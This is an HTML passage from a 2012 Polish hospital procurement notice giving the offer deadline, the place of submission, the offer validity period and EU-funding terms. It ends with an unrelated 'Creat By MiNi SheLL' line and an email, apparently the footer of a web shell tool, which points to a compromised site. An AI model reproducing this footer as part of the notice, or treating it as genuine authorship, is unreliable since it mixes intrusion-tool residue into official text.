<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 09:00, miejsce: W siedzibie Zamawiającego przy ul. Polnej 33, w pokoju 317 - Kancelaria Ogólna, w Budynku Wielofunkcyjnym Szpitala, wejście D1 lub drogą pocztową na adres Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com